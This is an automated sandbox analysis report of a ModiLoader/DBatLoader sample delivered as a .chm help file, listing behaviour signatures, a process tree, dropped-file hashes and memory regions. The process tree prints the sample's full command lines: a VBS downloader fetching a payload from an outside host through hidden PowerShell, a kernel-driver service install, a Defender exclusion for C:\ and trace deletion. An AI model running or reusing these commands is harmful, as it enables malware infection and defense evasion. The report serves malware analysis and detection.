Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-01-2025 03:34

General

  • Target

    c9385f9be9ce63aada94ced7076bada0b3b46ac3ceef3d55f09d9330a1f07b7b.chm

  • Size

    75KB

  • MD5

    be84e4cc5be9f94fa761fc67afa8fe80

  • SHA1

    7d3ef8e6e17a398631896d46458ba6c35f6467da

  • SHA256

    c9385f9be9ce63aada94ced7076bada0b3b46ac3ceef3d55f09d9330a1f07b7b

  • SHA512

    87be82fc1488af34b4eb868ad0628c642259358f229a8370bed02ea27efdccec9ed3def768c17627c3a7cc3cbb447e06e7fa8c565a246244bad2d97d3267bce0

  • SSDEEP

    1536:skQ/2F/Efsls403Pacb99MdsTEnmmqdHB3fmMwIUGlGgOtrI7mI:nQelsVyu5sYb3VOS7mI

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modiloader family
  • ModiLoader Second Stage 61 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\c9385f9be9ce63aada94ced7076bada0b3b46ac3ceef3d55f09d9330a1f07b7b.chm
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1760
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
      2⤵
      • Hide Artifacts: Hidden Window
      • Suspicious use of WriteProcessMemory
      PID:888
      • C:\Windows\system32\extrac32.exe
        extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
        3⤵
          PID:4132
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1092
          • C:\Users\Public\ript.exe
            "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd
            4⤵
            • Executes dropped EXE
            PID:3580
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4020
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\df.cmd" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1892
            • C:\Windows\system32\extrac32.exe
              extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
              5⤵
                PID:2580
              • C:\Users\Admin\AppData\Local\Temp\x.exe
                "C:\Users\Admin\AppData\Local\Temp\x.exe"
                5⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3168
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\HnqtinbxF.cmd" "
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:4476
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3988
                  • C:\Windows \SysWOW64\svchost.pif
                    "C:\Windows \SysWOW64\svchost.pif"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:5040
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd
                      8⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1896
                      • C:\Windows\system32\extrac32.exe
                        extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.pif
                        9⤵
                          PID:2992
                        • C:\Windows\system32\extrac32.exe
                          extrac32 /C /Y C:\\Windows\\System32\\sc.exe C:\\Users\\Public\\Upha.pif
                          9⤵
                            PID:556
                          • C:\Windows\system32\extrac32.exe
                            extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\aken.pif
                            9⤵
                              PID:448
                            • C:\Users\Public\alpha.pif
                              C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
                              9⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3976
                              • C:\Users\Public\Upha.pif
                                C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
                                10⤵
                                • Executes dropped EXE
                                PID:2388
                            • C:\Users\Public\alpha.pif
                              C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif start TrueSight
                              9⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:1760
                              • C:\Users\Public\Upha.pif
                                C:\\Users\\Public\\Upha.pif start TrueSight
                                10⤵
                                • Executes dropped EXE
                                PID:3432
                            • C:\Users\Public\alpha.pif
                              C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              9⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:1296
                              • C:\Users\Public\aken.pif
                                C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                10⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3244
                      • C:\Users\Public\Libraries\xbnitqnH.pif
                        C:\Users\Public\Libraries\xbnitqnH.pif
                        6⤵
                          PID:4936
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 1812
                          6⤵
                          • Program crash
                          PID:116
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM hh.exe
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3948
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3168 -ip 3168
                1⤵
                  PID:1548

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  d85ba6ff808d9e5444a4b369f5bc2730

                  SHA1

                  31aa9d96590fff6981b315e0b391b575e4c0804a

                  SHA256

                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                  SHA512

                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  64B

                  MD5

                  446dd1cf97eaba21cf14d03aebc79f27

                  SHA1

                  36e4cc7367e0c7b40f4a8ace272941ea46373799

                  SHA256

                  a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                  SHA512

                  a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  64B

                  MD5

                  5caad758326454b5788ec35315c4c304

                  SHA1

                  3aef8dba8042662a7fcf97e51047dc636b4d4724

                  SHA256

                  83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                  SHA512

                  4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hhhr53tx.nst.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\x.exe

                  Filesize

                  1.3MB

                  MD5

                  17a9121dc62c2dd580cd374d7e132198

                  SHA1

                  959f44160fdfe3fc4917450158aa0c5764c0ee33

                  SHA256

                  8d104933a03d3d9427c9db1df8edc07b7ccc7e0739f0471a97263478ae0aebb8

                  SHA512

                  6a06eeb871eec22e960e62198502bed06e8d804b3d2c14c8a1f32ad91ee2acd92a82c8297f896f114806d4c4052b0e24c41f1336be5a27aa649d480b10899722

                • C:\Users\Public\HnqtinbxF.cmd

                  Filesize

                  11KB

                  MD5

                  f82aeb3b12f33250e404df6ec873dd1d

                  SHA1

                  bcf538f64457e8d19da89229479cafa9c4cce12f

                  SHA256

                  23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

                  SHA512

                  6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

                • C:\Users\Public\Libraries\FX.cmd

                  Filesize

                  8KB

                  MD5

                  7821e3de3812e791cf3b223500d73bc9

                  SHA1

                  5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

                  SHA256

                  3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

                  SHA512

                  6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

                • C:\Users\Public\Libraries\NEO.cmd

                  Filesize

                  55KB

                  MD5

                  3c755cf5a64b256c08f9bb552167975c

                  SHA1

                  8c81ca56b178ffd77b15f59c5332813416d976d7

                  SHA256

                  12e0795aa1408bea69bfd0a53bb74558598e71b33fc12ffec0e0ae38d39da490

                  SHA512

                  8cf0f1a368089e2e3021ce6aeb4984821429d4bb9de3d273a9d0f571a847bba3fc429b84a877afec6decf40e6b94a69d52e8eeea55e042aa9773d3540dbe6bfa

                • C:\Users\Public\Upha.pif

                  Filesize

                  70KB

                  MD5

                  3fb5cf71f7e7eb49790cb0e663434d80

                  SHA1

                  b4979a9f970029889713d756c3f123643dde73da

                  SHA256

                  41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9

                  SHA512

                  2b59a6d0afef765c6ca80b5738202622cfe0dffcec2092d23ad8149156b0b1dca479e2e2c8562639c97e9f335429854cad12461f2fb277207c39d12e3e308ef5

                • C:\Users\Public\aken.pif

                  Filesize

                  442KB

                  MD5

                  04029e121a0cfa5991749937dd22a1d9

                  SHA1

                  f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                  SHA256

                  9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                  SHA512

                  6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                • C:\Users\Public\aloha.vbs

                  Filesize

                  194B

                  MD5

                  71efa4ec6c67fa5665b1d0c64d60fc25

                  SHA1

                  f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

                  SHA256

                  08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

                  SHA512

                  7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

                • C:\Users\Public\alpha.pif

                  Filesize

                  283KB

                  MD5

                  8a2122e8162dbef04694b9c3e0b6cdee

                  SHA1

                  f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                  SHA256

                  b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                  SHA512

                  99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                • C:\Users\Public\df.cmd

                  Filesize

                  1.3MB

                  MD5

                  bde4452bdba4bcc0a968e217717410e4

                  SHA1

                  f7d8b6bdacc1647c127df4017980e945f2476de4

                  SHA256

                  b96e72f0ade88aeed75d1d04df219887ed2f431ce6755c02ab504efa497460b1

                  SHA512

                  69419fb7c6815eb611d9ff725b0659eab2547bede4cd6e0c7d464f4f502585fd715b15243a6d025f2ddc81e51cf786635c6ba09e9c8b5fccef2e076e70d13fcd

                • C:\Users\Public\ript.exe

                  Filesize

                  157KB

                  MD5

                  24590bf74bbbbfd7d7ac070f4e3c44fd

                  SHA1

                  cdfe517d07f18623778829aa98d6bbadd3f294cd

                  SHA256

                  ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03

                  SHA512

                  ffaf2c86c9555513cdb51a7638f1fde3e8951a203aac63fd0aac62db297c853ac8c14e1a212c01d6b181df53e790f80489358489f6415d5c7fa53bfb8888bfa9

                • C:\Windows \SysWOW64\NETUTILS.dll

                  Filesize

                  116KB

                  MD5

                  0f088756537e0d65627ed2ea392dcaae

                  SHA1

                  983eb3818223641c13464831a2baad9466c3750f

                  SHA256

                  abe2b86bc07d11050451906dc5c6955e16341912a1da191fc05b80c6e2f44ad6

                  SHA512

                  d7ec6126467fd2300f2562be48d302513a92cee328470bf0b25b67dcf646ba6c824cd6195ba056b543db9e2a445991fe31ebc2f89d9eff084907d6af1384720d

                • C:\Windows \SysWOW64\svchost.pif

                  Filesize

                  94KB

                  MD5

                  869640d0a3f838694ab4dfea9e2f544d

                  SHA1

                  bdc42b280446ba53624ff23f314aadb861566832

                  SHA256

                  0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

                  SHA512

                  6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

                • memory/1092-16-0x000002344CFA0000-0x000002344CFC2000-memory.dmp

                  Filesize

                  136KB

                • memory/3168-78-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-93-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-111-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-110-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-109-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-108-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-106-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-105-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-104-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-103-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-102-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-100-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-98-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-97-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-96-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-95-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-92-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-90-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-89-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-87-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-112-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-82-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-107-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-114-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-101-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-99-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-77-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-76-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-75-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-94-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-73-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-113-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-71-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-88-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-70-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-86-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-85-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-69-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-84-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-83-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-68-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-81-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-80-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-67-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-79-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-66-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-65-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-64-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-74-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-62-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-61-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-60-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-58-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-57-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-115-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-117-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-91-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-72-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-63-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-59-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-55-0x0000000000400000-0x000000000054C000-memory.dmp

                  Filesize

                  1.3MB

                • memory/3168-53-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB

                • memory/3168-52-0x0000000002D70000-0x0000000003D70000-memory.dmp

                  Filesize

                  16.0MB